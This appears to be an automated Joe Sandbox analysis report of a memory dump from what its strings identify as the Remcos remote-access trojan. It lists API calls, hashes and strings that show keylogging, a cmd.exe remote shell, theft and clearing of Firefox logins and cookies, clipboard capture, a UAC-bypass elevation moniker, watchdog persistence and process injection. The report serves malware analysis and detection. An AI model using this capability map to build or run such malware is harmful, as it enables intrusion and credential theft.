                                          • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                          • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                          • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                          • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 94 446137-446143 95 446175-446180 call 4405dd 94->95 96 446145-446147 94->96 103 446182-446184 95->103 98 446160-446171 RtlAllocateHeap 96->98 99 446149-44614a 96->99 100 446173 98->100 101 44614c-446153 call 445545 98->101 99->98 100->103 101->95 106 446155-44615e call 442f80 101->106 106->95 106->98
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                          • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                          • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                          • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                          • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                            • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                            • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                            • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                            • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                            • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                          • DeleteFileA.KERNEL32(?), ref: 00408652
                                            • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                            • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                            • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                            • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                          • Sleep.KERNEL32(000007D0), ref: 004086F8
                                          • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                            • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                          • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                          • API String ID: 1067849700-181434739
                                          • Opcode ID: 8f1de24e8e2415dac4a89a953b4d4385ab3642e9f2366ded161f37adb31fab15
                                          • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                          • Opcode Fuzzy Hash: 8f1de24e8e2415dac4a89a953b4d4385ab3642e9f2366ded161f37adb31fab15
                                          • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 004056E6
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          • __Init_thread_footer.LIBCMT ref: 00405723
                                          • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                          • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                          • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                          • CloseHandle.KERNEL32 ref: 00405A23
                                          • CloseHandle.KERNEL32 ref: 00405A2B
                                          • CloseHandle.KERNEL32 ref: 00405A3D
                                          • CloseHandle.KERNEL32 ref: 00405A45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                          • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                          • API String ID: 2994406822-18413064
                                          • Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                                          • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                          • Opcode Fuzzy Hash: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                                          • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                          APIs
                                          • GetCurrentProcessId.KERNEL32 ref: 00412106
                                            • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                            • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                            • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                          • CloseHandle.KERNEL32(00000000), ref: 00412155
                                          • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                          • API String ID: 3018269243-13974260
                                          • Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                          • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                          • Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                          • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                          • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                          • FindClose.KERNEL32(00000000), ref: 0040BD12
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$CloseFile$FirstNext
                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                          • API String ID: 1164774033-3681987949
                                          • Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                          • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                          • Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                          • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                          APIs
                                          • OpenClipboard.USER32 ref: 004168C2
                                          • EmptyClipboard.USER32 ref: 004168D0
                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                          • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                          • CloseClipboard.USER32 ref: 00416955
                                          • OpenClipboard.USER32 ref: 0041695C
                                          • GetClipboardData.USER32(0000000D), ref: 0041696C
                                          • GlobalLock.KERNEL32(00000000), ref: 00416975
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                          • CloseClipboard.USER32 ref: 00416984
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                          • String ID: !D@
                                          • API String ID: 3520204547-604454484
                                          • Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                          • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                          • Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                          • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                          • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                          • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                          • FindClose.KERNEL32(00000000), ref: 0040BED0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$Close$File$FirstNext
                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 3527384056-432212279
                                          • Opcode ID: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                                          • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                          • Opcode Fuzzy Hash: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                                          • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                          • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                          • API String ID: 3756808967-1743721670
                                          • Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                          • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                          • Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                          • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 0$1$2$3$4$5$6$7$VG
                                          • API String ID: 0-1861860590
                                          • Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                          • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                          • Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                          • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                          APIs
                                          • _wcslen.LIBCMT ref: 00407521
                                          • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Object_wcslen
                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                          • API String ID: 240030777-3166923314
                                          • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                          • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                          • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                          • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                          APIs
                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                          • GetLastError.KERNEL32 ref: 0041A7BB
                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                          • String ID:
                                          • API String ID: 3587775597-0
                                          • Opcode ID: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                                          • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                          • Opcode Fuzzy Hash: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                                          • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                          APIs
                                            • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                            • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                          • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                          • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                          • String ID: lJD$lJD$lJD
                                          • API String ID: 745075371-479184356
                                          • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                          • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                          • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                          • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                          • FindClose.KERNEL32(00000000), ref: 0040C47D
                                          • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$CloseFile$FirstNext
                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 1164774033-405221262
                                          • Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                          • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                          • Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                          • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                          • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                          • GetLastError.KERNEL32 ref: 0040A2ED
                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                          • TranslateMessage.USER32(?), ref: 0040A34A
                                          • DispatchMessageA.USER32(?), ref: 0040A355
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                          • String ID: Keylogger initialization failure: error $`#v
                                          • API String ID: 3219506041-3226811161
                                          • Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                                          • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                          • Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                                          • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                            • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                          • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                          • String ID:
                                          • API String ID: 2341273852-0
                                          • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                          • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                          • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                          • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Find$CreateFirstNext
                                          • String ID: 8SG$PXG$PXG$NG$PG
                                          • API String ID: 341183262-3812160132
                                          • Opcode ID: c12a7a06cd91389c945adf6a1785f0550749601eff383afe73ed6c7c7bc712d6
                                          • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                          • Opcode Fuzzy Hash: c12a7a06cd91389c945adf6a1785f0550749601eff383afe73ed6c7c7bc712d6
                                          • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 0040A416
                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                          • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                          • GetKeyState.USER32(00000010), ref: 0040A433
                                          • GetKeyboardState.USER32(?), ref: 0040A43E
                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                          • String ID:
                                          • API String ID: 1888522110-0
                                          • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                          • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                          • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                          • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                            • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                          • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                          • String ID: SHDeleteKeyW$Shlwapi.dll
